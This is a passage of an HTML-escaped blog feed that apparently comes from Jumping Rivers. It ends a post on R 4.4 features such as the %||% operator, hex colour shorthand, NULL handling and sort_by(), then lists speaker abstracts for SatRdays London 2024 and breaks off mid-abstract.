&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;https://www.jumpingrivers.com/blog/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Assuming &lt;code&gt;config&lt;/code&gt; is a &lt;code&gt;list&lt;/code&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;when the &lt;code&gt;url&lt;/code&gt; entry is absent from &lt;code&gt;config&lt;/code&gt; (or is itself &lt;code&gt;NULL&lt;/code&gt;),
then &lt;code&gt;config$url&lt;/code&gt; will be &lt;code&gt;NULL&lt;/code&gt; and the variable &lt;code&gt;my_url&lt;/code&gt; will be set
to the default value;&lt;/li&gt;
&lt;li&gt;but when the &lt;code&gt;url&lt;/code&gt; entry is found within &lt;code&gt;config&lt;/code&gt; (and isn’t &lt;code&gt;NULL&lt;/code&gt;)
then that value will be stored in &lt;code&gt;my_url&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That code can now be rewritten as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.4.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; config&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;%||%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://www.jumpingrivers.com/blog/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_url
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;https://www.jumpingrivers.com/blog/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the right-hand side is only evaluated when the left-hand value is &lt;code&gt;NULL&lt;/code&gt;,
and that empty vectors aren’t &lt;code&gt;NULL&lt;/code&gt; (although &lt;code&gt;c()&lt;/code&gt;, called with no arguments, does return &lt;code&gt;NULL&lt;/code&gt;):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.4.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;%||%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%||%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;numeric&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%||%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; numeric(0)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This operator has been available in the &lt;code&gt;{rlang}&lt;/code&gt; package for eight
years and is implemented in exactly the same way. So if you have been
using &lt;code&gt;%||%&lt;/code&gt; in your code already, the base-R version of this operator
should work without any problems, though you may want to wait until you
are certain all your users are using R &amp;gt;= 4.4 before switching from
&lt;code&gt;{rlang}&lt;/code&gt; to the base-R version of &lt;code&gt;%||%&lt;/code&gt;.&lt;/p&gt;
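&lt;p&gt;If your code has to run on both older and newer versions of R, and you would rather not depend on a package for this, one option is to define a fallback yourself. The following is a minimal sketch rather than an official recipe: it defines &lt;code&gt;%||%&lt;/code&gt; only when base R doesn’t already provide it, and &lt;code&gt;get_url()&lt;/code&gt; is a hypothetical helper that shows the operator paired with a &lt;code&gt;NULL&lt;/code&gt; default argument.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Define a fallback only when base R (older than 4.4) lacks the operator
if (!exists(&amp;#34;%||%&amp;#34;, envir = baseenv(), inherits = FALSE)) {
  `%||%` = function(x, y) if (is.null(x)) y else x
}

# Hypothetical helper: `url` defaults to NULL, meaning
# &amp;#34;fall back to the blog URL&amp;#34;
get_url = function(url = NULL) {
  url %||% &amp;#34;https://www.jumpingrivers.com/blog/&amp;#34;
}

get_url()
#&amp;gt; [1] &amp;#34;https://www.jumpingrivers.com/blog/&amp;#34;
get_url(&amp;#34;https://www.jumpingrivers.com/&amp;#34;)
#&amp;gt; [1] &amp;#34;https://www.jumpingrivers.com/&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;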
&lt;h3 id="any-other-business"&gt;Any other business&lt;/h3&gt;
&lt;p&gt;A &lt;a href="https://en.wikipedia.org/wiki/Web_colors#Shorthand_hexadecimal_form" rel="external"&gt;shorthand hexadecimal
format&lt;/a&gt;
(common in web-programming) for specifying RGB colours has been
introduced. So, rather than writing the 6-digit hexcode for a colour
“#112233”, you can use “#123”. This only works for those 6-digit
hexcodes where the digits are repeated in pairs.&lt;/p&gt;
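&lt;p&gt;The expansion rule is simply that each digit of the shorthand is doubled. To illustrate it on any version of R, here is a sketch of a hypothetical helper, &lt;code&gt;expand_hex()&lt;/code&gt;, that applies the rule by hand; it is not part of base R and is only meant to show the mapping.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: expand &amp;#34;#RGB&amp;#34; shorthand to &amp;#34;#RRGGBB&amp;#34;.
# Anything that isn&amp;#39;t a 3-digit hexcode is returned unchanged.
expand_hex = function(x) {
  sub(
    &amp;#34;^#([0-9A-Fa-f])([0-9A-Fa-f])([0-9A-Fa-f])$&amp;#34;,
    &amp;#34;#\\1\\1\\2\\2\\3\\3&amp;#34;,
    x
  )
}

expand_hex(&amp;#34;#123&amp;#34;)
#&amp;gt; [1] &amp;#34;#112233&amp;#34;
expand_hex(c(&amp;#34;#fa0&amp;#34;, &amp;#34;#112233&amp;#34;))
#&amp;gt; [1] &amp;#34;#ffaa00&amp;#34; &amp;#34;#112233&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;On R 4.4 or later, &lt;code&gt;col2rgb(&amp;quot;#123&amp;quot;)&lt;/code&gt; should give the same result as &lt;code&gt;col2rgb(&amp;quot;#112233&amp;quot;)&lt;/code&gt;, so a helper like this is only of interest on older versions.&lt;/p&gt;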
&lt;p&gt;Parsing and formatting of complex numbers has been improved. For
example, &lt;code&gt;as.complex(&amp;quot;1i&amp;quot;)&lt;/code&gt; now returns the complex number &lt;code&gt;0 + 1i&lt;/code&gt;;
previously it returned &lt;code&gt;NA&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;There are a few other changes related to handling &lt;code&gt;NULL&lt;/code&gt; that have been
introduced in R 4.4. The changes highlight that &lt;code&gt;NULL&lt;/code&gt; is quite
different from an empty vector. Empty vectors contain nothing, whereas
&lt;code&gt;NULL&lt;/code&gt; represents nothing. For example, whereas an empty numeric vector
is considered to be an atomic (unnestable) data structure, &lt;code&gt;NULL&lt;/code&gt; is no
longer atomic. Also, &lt;code&gt;NCOL(NULL)&lt;/code&gt; (the number of columns in a matrix
formed from &lt;code&gt;NULL&lt;/code&gt;) is now 0, whereas it was formerly 1.&lt;/p&gt;
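&lt;p&gt;A few checks make the distinction concrete. The calls below should behave the same way before and after R 4.4. &lt;code&gt;is_atomic_or_null()&lt;/code&gt; is a hypothetical helper, sketched here for code that relied on &lt;code&gt;is.atomic(NULL)&lt;/code&gt; being &lt;code&gt;TRUE&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# An empty vector has a type and zero length, but it isn&amp;#39;t NULL
empty = numeric(0)
is.null(empty)
#&amp;gt; [1] FALSE
typeof(empty)
#&amp;gt; [1] &amp;#34;double&amp;#34;
length(empty)
#&amp;gt; [1] 0

# NULL also has zero length, but its type is &amp;#34;NULL&amp;#34;
typeof(NULL)
#&amp;gt; [1] &amp;#34;NULL&amp;#34;
length(NULL)
#&amp;gt; [1] 0

# Hypothetical helper: TRUE for atomic vectors and for NULL,
# whichever version of R is in use
is_atomic_or_null = function(x) is.null(x) || is.atomic(x)
is_atomic_or_null(NULL)
#&amp;gt; [1] TRUE
is_atomic_or_null(empty)
#&amp;gt; [1] TRUE
is_atomic_or_null(list())
#&amp;gt; [1] FALSE
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;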
&lt;p&gt;&lt;code&gt;sort_by()&lt;/code&gt; is a new function for sorting objects based on values in a
separate object. It can be used to sort a &lt;code&gt;data.frame&lt;/code&gt; based on its
columns (which should be specified as a formula):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sort_by&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(cyl, mpg)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## mpg cyl disp hp drat wt qsec vs am gear carb&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Volvo 142E 21.4 4 121.0 109 4.11 2.780 18.60 1 1 4 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Toyota Corona 21.5 4 120.1 97 3.70 2.465 20.01 1 0 3 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Datsun 710 22.8 4 108.0 93 3.85 2.320 18.61 1 1 4 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Merc 230 22.8 4 140.8 95 3.92 3.150 22.90 1 0 4 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Merc 240D 24.4 4 146.7 62 3.69 3.190 20.00 1 0 4 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Porsche 914-2 26.0 4 120.3 91 4.43 2.140 16.70 0 1 5 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="try-the-latest-version-out-for-yourself"&gt;Try the latest version out for yourself&lt;/h3&gt;
&lt;p&gt;To take away the pain of installing the latest development version of R,
you can use Docker. To try the &lt;code&gt;devel&lt;/code&gt; version of R, run the
following commands:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker pull rstudio/r-base:devel-jammy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -it rstudio/r-base:devel-jammy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once R 4.4 is the released version of R and the &lt;code&gt;r-docker&lt;/code&gt; repository
has been updated, you can use the following commands to test out R
4.4.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker pull rstudio/r-base:4.4-jammy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -it rstudio/r-base:4.4-jammy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="see-also"&gt;See also&lt;/h3&gt;
&lt;p&gt;The R 4.x versions have introduced a wealth of interesting changes.
These have been summarised in our earlier blog posts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-version-4-features/" rel="external"&gt;R 4.0.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/" rel="external"&gt;R
4.1.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r420/" rel="external"&gt;R 4.2.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/whats-new-r43/" rel="external"&gt;R 4.3.0&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/whats-new-r44/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2024: Registration Closing Soon</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2024-registration-closing/</link><pubDate>Fri, 12 Apr 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2024-registration-closing/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-registration-closing/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2024-registration-closing/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h3 a:after { content: unset; }
main h3 a { text-decoration: unset; }
&lt;/style&gt;
&lt;h3 id="satrdays-registration-will-be-closing-soon"&gt;SatRdays registration will be closing soon!&lt;/h3&gt;
&lt;p&gt;Here&amp;rsquo;s a reminder of what we have lined up for you.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ll be welcoming 9 fantastic speakers from across a variety of industries to give you an insight into how you can use R for many different applications, including use case examples such as modelling humanitarian crises and risks to road users, as well as systems involving high performance computing, and general overviews of new additions to the tidyverse, Quarto and much more!&lt;/p&gt;
&lt;p&gt;Check out the abstracts below. Don&amp;rsquo;t miss out on this excellent opportunity: sign up now &lt;a href="https://satrdays-london-2024.jumpingrivers.com/" rel="external"&gt;on the website&lt;/a&gt; and get 20% off the ticket price!&lt;/p&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;div class="central-content"&gt;
&lt;a href="https://satrdays-london-2024.jumpingrivers.com/" class="buttony-link dark"&gt;Register Now &lt;i class="fa fa-angle-double-right"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/div&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;h3 id="andrie-de-vries---posit"&gt;&lt;a href="https://www.linkedin.com/in/andriedevries/" rel="external"&gt;Andrie de Vries&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; &lt;img src="images/andrie@2x.jpg" alt="Photo of Andrie de Vries" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="lessons-learnt-from-product-management-applied-to-data-science"&gt;Lessons learnt from Product Management, applied to Data Science&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;As a Data Scientist you build data products all the time. You may even have worked with a Product Manager to create analyses and dashboards for decision making.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;But are you applying the skills of product management in your data science role?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;In this talk Andrie provides an overview of Product Management (PM), and what he’s learnt over two decades of managing products, ranging from hardware (Psion PDAs) to software (Microsoft R Open, Posit Workbench) and hosted services (MRAN).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Every product manager must consider the new product adoption life cycle, managing the stages from finding the first innovators, managing growth and ultimately the end-of-life process.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;During this process you must manage your product so that it’s usable (customers want it), feasible (you can build it) and valuable (you can do this sustainably). Many frameworks exist to think about discovering what customers want, the jobs they must get done, forming a value proposition, managing a product roadmap, working with dev teams to build it, and working with marketing and sales to create a compelling sales pitch.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;As a data scientist, you can benefit from product management knowledge by thinking of your app as a product. You must convince your users (internal customers) to use this app (at the cost of changing their workflow).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;I will leave you with a map to get started with classic resources, including Geoffrey Moore, Marty Cagan, Teresa Torres, April Dunford and Lenny’s Podcast.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="hannah-frick---posit"&gt;&lt;a href="https://www.linkedin.com/in/hannah-frick" rel="external"&gt;Hannah Frick&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; &lt;img src="images/hannah@2x.jpg" alt="Photo of Hannah Frick" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="survival-analysis-is-coming-to-tidymodels"&gt;Survival analysis is coming to tidymodels&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;If you have time-to-event data, such as data on customer churn, data on the lifetime of machines, or similar, survival analysis with its censored regression models gives you the ability to include all your observations in the model appropriately, including those where you may not have observed the event yet.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The tidymodels framework is a collection of packages for safe, performant, and expressive supervised predictive modeling on tabular data. The framework&amp;rsquo;s consistency makes switching between models easy, its guardrails against common pitfalls such as overfitting due to data leakage make it safe. It covers the entire modeling workflow: preprocessing and feature engineering, models, resamples, performance metrics, and tuning.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;We are now extending support for survival analysis across the entire tidymodels framework with dedicated models and metrics, allowing the same ease and expressiveness as for classification and regression, across all steps of the modeling process.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="charlie-gao---hibiki-ai-limited"&gt;&lt;a href="https://shikokuchuo.net/" rel="external"&gt;Charlie Gao&lt;/a&gt; - &lt;a href="https://hibiki-ai.com/" rel="external"&gt;Hibiki AI Limited&lt;/a&gt; &lt;img src="images/charlie@2x.jpg" alt="Photo of Charlie Gao" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="mirai-for-shiny-and-plumber-applications"&gt;‘mirai’ for Shiny and Plumber Applications&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;‘mirai’ is Japanese for ‘future’. Some of the existing solutions for parallelization in R have not fundamentally changed in 20 years. The technologies behind ‘mirai’ are, in contrast, modern and minimalist, and provide a level of performance that will be noticeable for demanding, client-facing workloads typical of Shiny and Plumber applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;As a scheduler for distributed tasks, ‘mirai’ currently powers the high performance computing needs for the ‘targets’ reproducible-workflow ecosystem, whether locally, on traditional HPC clusters or the cloud. It has undergone the validation required to reliably handle demanding scientific workloads such as clinical trials simulations. At R Project Sprint 2023, it was integrated as a backend for the base R ‘parallel’ package at the request of R-Core.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The same industrial-strength, yet incredibly lightweight solution is now available to power large-scale Shiny and Plumber applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;This presentation demonstrates how ‘mirai’ works in typical example situations which benefit from parallelization of computations, and the different ways they may be distributed to background processes on the same machine or across a network of servers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;A particular highlight will be the zero-configuration TLS option. This ‘just works’ to protect remote connections using single-use certificates generated on-the-fly. This was developed under an R Consortium infrastructure grant that aims to make such technologies available to the wider R community.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="michael-hogers---npl-markets-ltd"&gt;&lt;a href="https://www.linkedin.com/in/michaelhogers" rel="external"&gt;Michael Hogers&lt;/a&gt; - &lt;a href="https://nplmarkets.com/" rel="external"&gt;NPL Markets Ltd&lt;/a&gt; &lt;img src="images/michael@2x.jpg" alt="Photo of Michael Hogers" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="modular-shinyproxy---a-saas-setup"&gt;Modular Shiny(Proxy) - a SaaS setup&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;I aim to provide a talk that displays how one can use R, Shiny and ShinyProxy (or other deployment methods) to create a modular SaaS platform that later allows you to swap out modules of the platform with new languages or frameworks. The key ingredients are: use a database back-end across Shiny modules, deploy modules as relatively small apps to dedicated URL endpoints, use a shared UI library across Shiny modules and package your Shiny apps (+ use CI/CD) while keeping business logic separated to later on export business logic functions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="matthew-lam--matthew-law---mott-macdonald"&gt;&lt;a href="https://www.linkedin.com/in/matthewgarethlam/" rel="external"&gt;Matthew Lam&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/matthewjlaw/" rel="external"&gt;Matthew Law&lt;/a&gt; - &lt;a href="https://www.mottmac.com/" rel="external"&gt;Mott MacDonald&lt;/a&gt;&lt;/h3&gt;
&lt;div&gt;&lt;img src="images/matthew-lam@2x.jpg" alt="Photo of Matthew Lam" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt; &lt;img src="images/matthew-law@2x.jpg" alt="Photo of Matthew Law" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt; &lt;/div&gt;
&lt;h4 id="how-mott-macdonald-unlocks-the-power-of-geospatial-data-with-r"&gt;How Mott MacDonald unlocks the power of geospatial data with R&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;Mott MacDonald is a global engineering, management, and development consultancy with a broad portfolio of projects across various engineering disciplines. Geospatial data plays an instrumental role in supporting projects in these sectors, enabling us to understand the world around us so that we can make better informed decisions, improve efficiencies, and drive digital innovation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;In this presentation, we will illustrate how we use R at Mott MacDonald to harness the power of geospatial data with two examples – Risk Modelling for Ash Dieback and Creative Geospatial Visualisation for Impactful Communication.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The Ash Dieback Pipeline is a computer vision project which attempts to identify trees with the Ash Dieback disease from video footage of roadways around the UK. We intend to showcase how we use R to process a variety of geospatial datasets and attempt to model the risk to road users associated with a diseased tree remaining untreated.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Our work at Mott MacDonald often involves wrangling complex datasets to answer multifaceted questions. R provides excellent toolkits for integrating, analysing, and visualising geospatial datasets. We intend to demonstrate how R can be used for creative visualisation of geospatial data to extract and communicate actionable insights.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Through these examples, we hope to outline our team’s maturity journey towards building multilingual spatial data science capabilities alongside traditional GIS platforms.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="myles-mitchell---jumping-rivers"&gt;&lt;a href="https://uk.linkedin.com/in/myles-mitchell-4009aa98" rel="external"&gt;Myles Mitchell&lt;/a&gt; - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt; &lt;img src="images/myles@2x.jpg" alt="Photo of Myles Mitchell" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="using-r-to-teach-r"&gt;Using R to teach R&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;At Jumping Rivers, we teach over forty courses covering data science topics, including programming, data visualisation and machine learning, in R as well as Python, Tableau, Git, Docker and Stan. Most courses follow the same template: static notes, live coding scripts and presentation slides. For every taught course we also have to spin up a bespoke virtual environment, collect feedback and generate certificates.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;In this talk, I will explain how we have used R to streamline the course writing process, automate the course build and deployment to Posit Workbench, and conduct post-course administrative tasks. With over 100 courses taught every year, each step in this pipeline must be rigorously tested so that, on the day, the trainer can focus on the attendees without having to worry about technical issues.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;I will draw on our process&amp;rsquo;s successes (and shortcomings) and share some take-home lessons applicable to any big coding project, including packaging of source code, automated testing and scheduled builds.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="nicola-rennie---lancaster-university"&gt;&lt;a href="https://www.linkedin.com/in/nicola-rennie/" rel="external"&gt;Nicola Rennie&lt;/a&gt; - &lt;a href="https://www.lancaster.ac.uk/health-and-medicine/research/statistics/" rel="external"&gt;Lancaster University&lt;/a&gt; &lt;img src="images/nicola@2x.jpg" alt="Photo of Nicola Rennie" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="typst-or-latex-styling-pdf-documents-with-quarto-extensions"&gt;Typst or LaTeX? Styling PDF documents with Quarto extensions&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
